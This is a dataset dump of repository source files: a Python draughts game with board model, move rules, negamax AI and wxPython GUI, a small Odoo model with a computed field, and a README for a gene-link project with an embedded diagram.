"text": "import game_board\nimport game_rules\nimport random\nimport game_ai_player\nimport time\nimport threading\n\n\nb = game_board.Board()\nb.initial()\nrules = game_rules.Rules(game_board._n)\nprint(b)\ndepth = 2\n\n'''\nprint(list(b.units(True)))\nprint(list(b.units(False)))\n\nrules = game_rules.Rules(game_board._n)\nfor mx in rules.play(b, True):\n bx = rules.transformed_board(b, mx)\n print(bx)\n''' \n\n'''\nclass GameTreeBuilder(threading.Thread):\n def __init__(self, board, rules, turn, m0, depth):\n threading.Thread.__init__(self)\n self.depth = depth\n self.board = board\n self.rules = rules\n self.turn = turn\n self.tree = m0\n self.tooktime = 0\n\n def run(self):\n start = time.time()\n self.tree = game_ai_player.build_game_tree(self.tree, 2, self.board, self.rules, self.turn, self.depth)\n end = time.time()\n self.tooktime = end - start\n\nN = 8\nb = game_board.Board(N)\nb.initial()\nrules = game_rules.Rules(N)\ndepth = 4\nturn = 1\nthreads = []\ngame_tree = '0 x 42\\n'\nfor mx in rules.play(b, turn):\n bx = b.clone()\n rules.apply(bx, mx)\n a_move = game_ai_player.move_to_str(mx, 1, -game_ai_player.max_value)+'\\n'\n tx = GameTreeBuilder(bx, rules, -turn, a_move, depth-1)\n threads.append(tx)\n tx.start()\n \nfor tx in threads:\n tx.join()\n game_tree += tx.tree\n \nfor tx in threads: \n print \"tree size\", len(tx.tree), \"bytes\", \"took time\", tx.tooktime, \"sec\"\n print \"\"\n\ntt0 = time.time()\ngame_tree_lines = game_tree.splitlines()\ntt1 = time.time()\nn = game_ai_player.TextNode(game_tree_lines, 0)\nr, move_list = game_ai_player.maxi(n)\ntt2 = time.time()\nprint \"result\", r\nprint \"split\", tt1-tt0, \"sec\"\nprint \"minimax\", tt2-tt1, \"sec\"\n\nfor move_index in move_list:\n print game_ai_player.TextNode(game_tree_lines, move_index)\n\n\nfor ln in game_tree_lines:\n print ln\n'''"
},
{
"alpha_fraction": 0.5273542404174805,
"alphanum_fraction": 0.5346572995185852,
"avg_line_length": 27.694852828979492,
"blob_id": "e3e8d60cccac143ce5f9179627814d1aadb2eb6c",
"content_id": "13af32ca0207f22b8afce0df032d2c37480388f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7805,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 272,
"path": "/game_gui.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import wx\nimport threading\nimport game_board\nimport game_rules\nimport random\nimport copy\nimport time\nimport game_ai_player\n\n\ndef col_index(n, size):\n return (n - 1) % (size // 2)\n\n\ndef row(n, size):\n return (n - 1) // (size // 2)\n\n\ndef col(n, size):\n return col_index(n, size) * 2 + 1 - (row(n, size) % 2)\n\n\n_hit = 1\n_move = 0\n\n_human = 0\n_ai = 1\n\n_black_move = False\n_white_move = True\n\n\nclass MainForm(wx.Frame):\n def __init__(self, board, rules):\n wx.Frame.__init__(self, None, size=(400, 400))\n menu_bar = wx.MenuBar()\n menu = wx.Menu()\n menu_item = wx.MenuItem(menu, wx.ID_NEW, \"New game\", \"Start a new game\")\n menu.Append(menu_item)\n menu_bar.Append(menu, '&Game')\n self.SetMenuBar(menu_bar)\n self.Bind(wx.EVT_MENU, self.start_new_game, menu_item)\n\n self.num_buttons = game_board._N\n self.btn = []\n self.selected_btn = []\n self.move_type = _hit # 0 - move 1 - hit\n self.move_list = []\n self.step = 0\n sz = self.GetSize()\n h = 3 * sz[0] // N // 4\n w = 3 * sz[1] // N // 4\n\n for i in range(0, self.num_buttons):\n x = col(i + 1, N) * w\n y = row(i + 1, N) * h\n btn = wx.Button(self, pos=(x, y), size=(w, h))\n btn.SetFont(btn.GetFont().MakeLarger().MakeLarger())\n self.btn.append(btn)\n\n self.current_turn = _white_move\n self.white_player = _human\n self.black_player = _human\n self.board = board\n self.rules = rules\n self.start_new_game(None)\n # self.set_board(board, rules, player)\n\n def player(self):\n return self.white_player if self.current_turn == _white_move else self.black_player\n\n def start_new_game(self, evt):\n self.Bind(EVT_MOVE, self.on_ai_move)\n self.current_turn = _white_move\n self.white_player = _human\n self.black_player = _ai\n self.board.initial()\n self.set_board(self.board, self.rules, self.current_turn)\n\n def set_board(self, board, rules, turn):\n for i in range(0, self.num_buttons):\n if board.empty(i):\n self.btn[i].SetLabel(' ')\n else:\n self.btn[i].SetLabel(board.dot(i))\n # build move list for the board\n if self.player() == _human:\n self.move_list = rules.move_list(board, turn)\n self.init_filter()\n else:\n ai_thread = AI(self, self.board, self.rules, self.current_turn)\n ai_thread.start()\n\n def _bind_button(self, btn):\n if btn not in self.selected_btn:\n self.selected_btn.append(btn)\n btn.Bind(wx.EVT_BUTTON, self.on_button_click)\n\n def _unbind_buttons(self):\n for btn in self.selected_btn:\n btn.Unbind(wx.EVT_BUTTON)\n self.selected_btn = []\n\n def _move_place(self, move):\n if self.step == 0:\n return game_rules._from_str(move[-1])\n else:\n return game_rules._from_str(move[-self.step * 2])\n\n def init_filter(self):\n self.step = 0\n self.selected_btn = []\n for move in self.move_list:\n button = self.btn[self._move_place(move)]\n self._bind_button(button)\n\n def set_filter(self, point):\n new_list = []\n for move in self.move_list:\n if len(move) > self.step:\n if self._move_place(move) == point:\n new_list.append(move)\n self.move_list = new_list\n self.step += 1\n self._unbind_buttons()\n if not self.done():\n for move in self.move_list:\n if len(move) > self.step:\n num = self._move_place(move)\n self._bind_button(self.btn[num])\n\n def done(self):\n return len(self.move_list) == 1 or len(self.move_list) == 0\n\n def on_button_click(self, evt):\n target = evt.GetEventObject()\n n = self.btn.index(target)\n self.set_filter(n)\n if self.done():\n self._make_move(self.move_list[0])\n\n def _make_move(self, a_move):\n self.rules.apply(self.board, a_move)\n self.current_turn = not 
self.current_turn\n self.set_board(self.board, self.rules, self.current_turn)\n\n def on_ai_move(self, evt):\n #\"ai move\"\n a_move = evt.GetValue()\n self._make_move(a_move)\n\n\nclass MoveEvent(wx.PyCommandEvent):\n def __init__(self, value=None):\n wx.PyCommandEvent.__init__(self, EVT_MOVE_TYPE, -1)\n self._value = value\n\n def GetValue(self):\n return self._value\n\n\n'''\nclass AI0(threading.Thread):\n def __init__(self, parent, board, rules, turn):\n threading.Thread.__init__(self)\n self.parent = parent\n self.board = board\n self.rules = rules\n self.turn = turn\n\n def run(self):\n # dumb player\n move_list = self.rules.move_list(self.board, self.turn)\n if len(move_list) > 0:\n time.sleep(1)\n a_move = random.choice(move_list)\n evt = MoveEvent(a_move)\n wx.PostEvent(self.parent, evt)\n else:\n # resign\n pass\n\n\ndef nodes(root):\n if root is not None:\n r = 1\n for c in root.child:\n r += nodes(c)\n return r\n else:\n return 0\n'''\n\n\nclass GameTreeBuilder(threading.Thread):\n def __init__(self, move, board, rules, turn, depth):\n threading.Thread.__init__(self)\n self.depth = depth\n self.board = board\n self.move = move\n self.rules = rules\n self.turn = turn\n self.tooktime = 0\n self.evaluation = 0\n\n def run(self):\n start = time.time()\n alpha = -game_ai_player.max_value\n beta = game_ai_player.max_value\n self.evaluation = game_ai_player.negamax(self.board, self.rules, self.turn, self.depth, alpha, beta)\n end = time.time()\n self.tooktime = end - start\n\n\nclass AI(threading.Thread):\n def __init__(self, parent, board, rules, turn):\n threading.Thread.__init__(self)\n self.parent = parent\n self.board = board\n self.rules = rules\n self.turn = turn\n random.seed()\n\n def run(self):\n threads = []\n depth = 9\n t0 = time.time()\n moves = self.rules.move_list(self.board, self.turn)\n if len(moves) > 1:\n for mx in moves:\n bx = copy.deepcopy(b) #b.clone()\n self.rules.apply(bx, mx)\n tx = GameTreeBuilder(mx, bx, self.rules, not self.turn, depth - 1)\n threads.append(tx)\n tx.start()\n for tx in threads:\n tx.join()\n t1 = time.time()\n if len(threads) > 0:\n e = max(threads, key=lambda item: item.evaluation) if self.turn else min(threads, key=lambda item: item.evaluation)\n for tx in threads:\n print(tx.board)\n print(\"eval \", tx.evaluation, \"move \", tx.move)\n print(e.evaluation)\n best_move_threads = list(filter(lambda x: x.evaluation == e.evaluation, threads))\n best_tx = random.choice(best_move_threads)\n\n evt = MoveEvent(best_tx.move)\n wx.PostEvent(self.parent, evt)\n print(\"build tree\", t1 - t0, \"depth\", depth)\n else:\n # resign\n pass\n elif len(moves) == 1:\n evt = MoveEvent(moves[0])\n wx.PostEvent(self.parent, evt)\n else:\n pass\n\n\nN = game_board._n\nb = game_board.Board()\nr = game_rules.Rules(N)\n\nEVT_MOVE_TYPE = wx.NewEventType()\nEVT_MOVE = wx.PyEventBinder(EVT_MOVE_TYPE, 1)\napp = wx.App()\n\nform = MainForm(b, r)\nform.Show()\n\napp.MainLoop()\n"
},
{
"alpha_fraction": 0.40902256965637207,
"alphanum_fraction": 0.4195488691329956,
"avg_line_length": 27.18644142150879,
"blob_id": "f0f5e7e06d1d3f126ca2350f49a910209215db3e",
"content_id": "25b5565e0b6ad919236b25ec2a9d867d8ec68f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3325,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 118,
"path": "/game_board.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import re\n\n_n = 8 # sqrt(_N*2) board size _n * _n\n_N = _n * _n // 2 # number of fields on the board ('dots')\n_mask = [1 << x for x in range(0, _N)] # bit mask of each dot in the board\n\n\ndef dot_index(_col, _row):\n return (_row * _n + _col) // 2\n\n\nclass Board:\n __slots__ = ['full','black','dam']\n\n def __init__(self):\n self.full = 0 # bitmap: bit[i] == 1 - a dot not empty, i = 0 .. _N -1\n self.black = 0 # bitmap: bit[i] == 1 - a dot is black\n self.dam = 0 # bitmap: bit[i] == 1 - a dot is dam\n\n # return dot symbol at specified position \".\" - empty, o - white, O - white dam, x - black, X - black dam\n def dot(self, n):\n mask = _mask[n]\n if self.full & mask == 0:\n return '.'\n else:\n is_dam = self.dam & mask != 0\n is_black = self.black & mask != 0\n if is_dam:\n return 'X' if is_black else 'O'\n else:\n return 'x' if is_black else 'o'\n\n # board as human readable string\n def __str__(self):\n res = ''\n for r in range(0, _n):\n res += '\\n'\n for c in range(0, _n):\n if (r + c) % 2 == 1:\n n = dot_index(c, r)\n res += self.dot(n)\n else:\n res += ' '\n #res += '\\nfull '+format(self.full, 'b') +'\\ndam '+format(self.dam, 'b') + '\\nblack '+format(self.black, 'b')+'\\n'\n return res\n \n def initial(self):\n self.clear()\n x = (_N - _n) // 2\n for i in range(0, x):\n b_mask = _mask[i]\n w_mask = _mask[_N - i - 1]\n self.black |= b_mask\n self.full |= b_mask | w_mask\n\n def load(self, text):\n st = re.sub(r'[^xXoO.]', \"\", text)\n self.clear()\n assert(len(st) == _N)\n for i in range(0, len(st)):\n if st[i] != '.':\n mask = _mask[i]\n self.full |= mask\n if st[i] == 'O' or st[i] == 'X':\n self.dam |= mask\n if st[i] == 'X' or st[i] == 'x':\n self.black |= mask \n\n def is_dam(self, n):\n return self.dam & _mask[n] != 0\n \n def is_black(self, n):\n return self.black & _mask[n] != 0\n\n def empty(self, n):\n return self.full & _mask[n] == 0 \n\n def clear(self):\n self.full = 0\n self.dam = 0\n self.black = 0\n\n def set(self, n, _white, _dam):\n m = _mask[n] \n self.full |= m\n if _white:\n self.black &= ~m\n else:\n self.black |= m\n if _dam:\n self.dam |= m\n else:\n self.dam &= ~m\n \n def set_empty(self, n):\n self.full &= ~_mask[n]\n\n def owned_by(self, white_player, n):\n m = _mask[n]\n if self.full & m == 0:\n return False\n if white_player:\n return self.black & m == 0\n else:\n return self.black & m != 0\n\n # side - white == True or black == False\n def units(self, side):\n for i in range(0, _N):\n if self.owned_by(side, i):\n yield i\n\n def clone(self):\n b = Board()\n b.full = self.full\n b.dam = self.dam\n b.black = self.black\n return b"
},
{
"alpha_fraction": 0.4587581157684326,
"alphanum_fraction": 0.47358664870262146,
"avg_line_length": 32.37113571166992,
"blob_id": "e4027610e474c6de709e193a1f4b9c897b40cf87",
"content_id": "4930a364902a0f763f5c2227902714517c6cfe18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6474,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 194,
"path": "/game_rules.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "_backward = [0, 1]\n_forward = [2, 3]\n_all_directions = [0, 1, 2, 3]\n_vector = [[-1, 1], [1, 1], [-1, -1], [1, -1]]\n\n\nclass BoardGeometry:\n def __init__(self, size):\n self.d = size // 2\n self.D = size\n assert(size >= 4)\n assert(size % 2 == 0)\n \n def fields(self):\n return self.D * self.D // 2\n\n def col_index(self, n):\n return n % self.d\n\n def row(self, n):\n return n // self.d\n\n def col(self, n):\n return self.col_index(n) * 2 + 1 - (self.row(n) % 2)\n\n def number(self, _col, _row):\n i = _col // 2\n return _row * self.d + i\n\n def near(self, n, direction):\n c = self.col(n) + _vector[direction][0]\n if 0 <= c < self.D:\n r = self.row(n) + _vector[direction][1]\n if 0 <= r < self.D:\n return self.number(c, r)\n return self.fields()\n \n \ndef _to_str(n):\n return chr(n + 0x30)\n\n\ndef _from_str(ch):\n return ord(ch) - 0x30 \n\n\nclass Rules:\n def __init__(self, board_size):\n g = BoardGeometry(board_size)\n self.fields = g.fields()\n self.way = []\n for i in range(0, g.fields()):\n self.way.append([g.near(i, 0), g.near(i, 1), g.near(i, 2), g.near(i, 3)])\n self.dam_target_white = [i for i in range(0, g.d)]\n self.dam_target_black = [g.d * g.D - i - 1 for i in range(0, g.d)]\n \n def _valid(self, n):\n return n < self.fields\n \n def _dam_field(self, white_turn, n):\n if white_turn:\n return n in self.dam_target_white\n else:\n return n in self.dam_target_black\n \n def _hit(self, board, player, n, direction):\n n1 = self.way[n][direction]\n if self._valid(n1) and board.owned_by(not player, n1):\n n2 = self.way[n1][direction]\n if self._valid(n2) and board.empty(n2):\n return _to_str(n1) + _to_str(n2)\n return None\n\n def _dam_hit(self, board, player, n, direction):\n n1 = self.way[n][direction]\n while self._valid(n1) and board.empty(n1):\n n1 = self.way[n1][direction]\n result = [] \n if self._valid(n1) and board.owned_by(not player, n1):\n n2 = self.way[n1][direction]\n while self._valid(n2) and board.empty(n2):\n result.append(_to_str(n1) + _to_str(n2))\n n2 = self.way[n2][direction]\n return result\n \n def _hit_way(self, board, white_turn, n, way):\n res = {}\n dirs = []\n for d in _all_directions:\n r = self._hit(board, white_turn, n, d)\n if r is not None:\n if r[0] not in way:\n dirs.append(d)\n res[d] = r\n if len(dirs) == 0:\n yield way\n for d in dirs:\n n1 = _from_str(res[d][1])\n way_generator = self._hit_dam_way if self._dam_field(white_turn, n1) else self._hit_way # russian rule\n # way_generator = self._hit_way # international rule\n for a_way in way_generator(board, white_turn, n1, way + res[d]):\n yield a_way\n\n def _hit_dam_way(self, board, white_turn, n, way):\n res = {}\n dirs = []\n for d in _all_directions:\n r = self._dam_hit(board, white_turn, n, d)\n if len(r) > 0:\n if r[0][0] not in way:\n dirs.append(d)\n res[d] = r\n if len(dirs) == 0:\n yield way\n for d in dirs:\n sub_ways = []\n final_ways = []\n for r in res[d]:\n n1 = _from_str(r[1])\n for new_way in self._hit_dam_way(board, white_turn, n1, way + r):\n if len(new_way) == len(way+r):\n final_ways.append(new_way)\n else:\n sub_ways.append(new_way)\n if len(sub_ways) == 0:\n sub_ways = final_ways\n for a_way in sub_ways:\n yield a_way\n \n def hits(self, board, white_turn):\n for i in board.units(white_turn):\n way_gen = self._hit_dam_way if board.is_dam(i) else self._hit_way\n for r in way_gen(board, white_turn, i, \"\"):\n if len(r) > 0:\n yield r + _to_str(i)\n\n def _move(self, board, white_turn, n):\n directions = _forward if white_turn else _backward\n for d in 
directions:\n x = self.way[n][d]\n if self._valid(x) and board.empty(x):\n yield _to_str(x)\n\n def _dam_move(self, board, white_turn, n):\n for d in _all_directions:\n x = self.way[n][d]\n while self._valid(x) and board.empty(x):\n yield _to_str(x)\n x = self.way[x][d]\n\n def moves(self, board, white_turn):\n for i in board.units(white_turn):\n way_gen = self._dam_move if board.is_dam(i) else self._move\n for dest in way_gen(board, white_turn, i):\n yield dest + _to_str(i)\n\n # input m - [taken_1, move_point_1.. taken_n, move_point_n, move_point_0]\n def apply(self, board, move):\n src = _from_str(move[-1])\n dest = _from_str(move[-2])\n is_dam = board.is_dam(src)\n color = not board.is_black(src)\n assert(not board.empty(src))\n board.set_empty(src)\n is_dam |= self._dam_field(color, dest)\n if len(move) > 2:\n assert((len(move) % 2) == 1)\n for i in range(0, (len(move) - 1) // 2):\n x = _from_str(move[i*2])\n board.set_empty(x) # empty taken units\n # russian dam rules\n y = _from_str(move[i*2+1])\n is_dam |= self._dam_field(color, y)\n board.set(dest, color, is_dam)\n\n def transformed_board(self, board, move):\n b = board.clone()\n self.apply(b, move)\n return b\n\n def play(self, board, white_turn):\n no_hit = True\n for m in self.hits(board, white_turn):\n yield m\n no_hit = False\n if no_hit:\n for m in self.moves(board, white_turn):\n yield m \n \n def move_list(self, board, white_turn):\n move_list = []\n for a_move in self.play(board, white_turn):\n move_list.append(a_move)\n return move_list\n"
},
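The record above implements the board model and move generation for a draughts (checkers) engine. As a quick orientation, here is a minimal sketch of the field numbering, assuming the code above is saved as a module named game_rules (a hypothetical name):

```
# Sketch only: assumes the BoardGeometry class from the record above is
# importable from a module named game_rules (hypothetical module name).
from game_rules import BoardGeometry

g = BoardGeometry(8)                # standard 8x8 board
print(g.fields())                   # -> 32 playable (dark) fields
print(g.row(0), g.col(0))           # -> 0 1: field 0 sits at row 0, column 1
print(g.near(0, 0), g.near(0, 1))   # -> 4 5: its two diagonal neighbours
print(g.near(0, 2))                 # -> 32 (== fields()), i.e. off the board
```

The sentinel return value fields() for off-board squares is what Rules._valid() checks against.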
{
"alpha_fraction": 0.5119418501853943,
"alphanum_fraction": 0.5295950174331665,
"avg_line_length": 23.66666603088379,
"blob_id": "d426f16810540da4845ca8a9e6e271a01461b479",
"content_id": "eba2d193073685d2b8b5d9c34794da3471cfda3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/game_ai_player.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import game_board\n\n\ndef evaluate(_board):\n result = 0\n for i in range(0, game_board._N):\n c = _board.dot(i)\n if c == 'o':\n result += 1\n elif c == 'O':\n result += 3\n elif c == 'x':\n result -= 1\n elif c == 'X':\n result -= 3\n else:\n continue\n return result\n\nmax_value = 100\n\n\ndef is_hit(move):\n return len(move) > 2\n\n\ndef negamax(board, rules, white_turn, depth, alpha, beta):\n if depth == 0:\n return evaluate(board) if white_turn else -evaluate(board)\n result = -max_value\n for m0 in rules.play(board, white_turn):\n b0 = rules.transformed_board(board, m0)\n new_depth = depth if is_hit(m0) else depth - 1\n evaluation = negamax(b0, rules, not white_turn, new_depth, -beta, -alpha)\n result = max(result, -evaluation)\n alpha = max(alpha, result)\n if alpha >= beta:\n break\n return result\n\n"
}
] | 5 |
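negamax() in game_ai_player.py only returns a score, so move selection happens at the root. A sketch of such a driver, assuming the py_draugth records above are importable as game_ai_player (hypothetical module name) and that board/rules are instances of the Board and Rules types shown there:

```
# Sketch only: module names and the board/rules objects are assumptions.
from game_ai_player import negamax, is_hit, max_value

def best_move(board, rules, white_turn, depth=6):
    best, best_score = None, -max_value
    for move in rules.play(board, white_turn):
        child = rules.transformed_board(board, move)
        # mirror the search's rule: captures do not consume depth
        d = depth if is_hit(move) else depth - 1
        # full window at the root, kept simple at the cost of some pruning
        score = -negamax(child, rules, not white_turn, d, -max_value, max_value)
        if score > best_score:
            best, best_score = move, score
    return best, best_score
```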
yasr3mr96/tttt
|
https://github.com/yasr3mr96/tttt
|
a37c49ff5bb6c88f730d066d65654ff567dee2ae
|
2a9a2776364b3801c857cd15d8c6bbb9919df7c6
|
79cf16862a3f1338637ccc103e377bf12355d082
|
refs/heads/master
| 2021-05-21T22:40:30.836792 | 2020-04-03T20:45:04 | 2020-04-03T20:45:04 | 252,836,822 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6063675880432129,
"alphanum_fraction": 0.6150506734848022,
"avg_line_length": 27.79166603088379,
"blob_id": "23ded7f1bf868925a1dc7434b8fcc8991047a4e9",
"content_id": "ca28ac06cac3cab867c5df2c00582197e65b40d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 24,
"path": "/models/models.py",
"repo_name": "yasr3mr96/tttt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass tttt(models.Model):\n _name = 'tttt.tttt'\n\n name = fields.Char()\n value = fields.Integer()\n value2 = fields.Float(compute=\"_value_pc\", store=True)\n description = fields.Text()\n lines = fields.One2many(comodel_name=\"lines\", inverse_name=\"p\")\n\n @api.depends('lines')\n def _value_pc(self):\n for i in self:\n for line in i.lines:\n i.value2 =line.t*5\n\nclass lines(models.Model):\n _name='lines'\n name = fields.Char(string=\"\", required=False)\n t = fields.Float(string=\"\", required=False)\n p = fields.Many2one(comodel_name=\"tttt.tttt\", string=\"\", required=False)\n"
}
] | 1 |
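For the Odoo model above, the computed field can be exercised from an `odoo shell` session. A sketch, assuming the tttt module is installed in the database; the record values are illustrative:

```
# Sketch for an `odoo shell` session; `env` is provided by the shell.
rec = env['tttt.tttt'].create({
    'name': 'demo',
    'value': 10,
    # one2many create commands: (0, 0, values)
    'lines': [(0, 0, {'name': 'a', 't': 2.0}),
              (0, 0, {'name': 'b', 't': 3.0})],
})
print(rec.value2)  # 25.0 with the summed compute shown above (2*5 + 3*5)
env.cr.commit()    # persist, since shell transactions are not auto-committed
```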
lgdc-ufpa/immunogenetic-applications-in-covid-19
|
https://github.com/lgdc-ufpa/immunogenetic-applications-in-covid-19
|
bc0fc05dcd26cd3254c4e152287dc4341b2daa97
|
0790eaa0f30294a745f360c3f9fcea50d8ed8c96
|
8885a4ae80b5be2a3331b210c195866c08fe74d1
|
refs/heads/master
| 2023-04-02T09:04:56.067668 | 2021-01-18T21:10:03 | 2021-01-18T21:10:03 | 330,265,369 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6495398879051208,
"alphanum_fraction": 0.7239263653755188,
"avg_line_length": 80.5625,
"blob_id": "b453aa257609cea4adea3aaf1ba2a0ad8b6bc06e",
"content_id": "86c3b09c8ce39fed8f08aeb911afc81de76ea1a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1304,
"license_type": "no_license",
"max_line_length": 832,
"num_lines": 16,
"path": "/sprint2_genes_from_orphanet/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 02: get ensembl links\n---\n**DETAILS:**\nGet each link from ensembl storaged in sprint 01 output (links_genes.html) and put them in a table/csv file to analyse manually.\n---\n<!--[if IE]><meta http-equiv=\"X-UA-Compatible\" content=\"IE=5,IE=9\" ><![endif]-->\n<!-- <!DOCTYPE html> -->\n<html>\n<head>\n<title>pictures</title>\n<meta charset=\"utf-8\"/>\n</head>\n<body><div class=\"mxgraph\" style=\"max-width:100%;border:1px solid transparent;\" data-mxgraph=\"{"nav":true,"resize":true,"toolbar":"zoom layers lightbox","edit":"_blank","xml":"<mxfile host=\\"Electron\\" modified=\\"2021-01-18T15:51:21.775Z\\" agent=\\"5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) draw.io/14.1.8 Chrome/87.0.4280.88 Electron/11.1.1 Safari/537.36\\" etag=\\"OWv65n12ZWU8uEJmnsSG\\" version=\\"14.1.8\\" type=\\"device\\"><diagram id=\\"-ETIXZryIh__wcPm28Kg\\" name=\\"sprint2\\">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
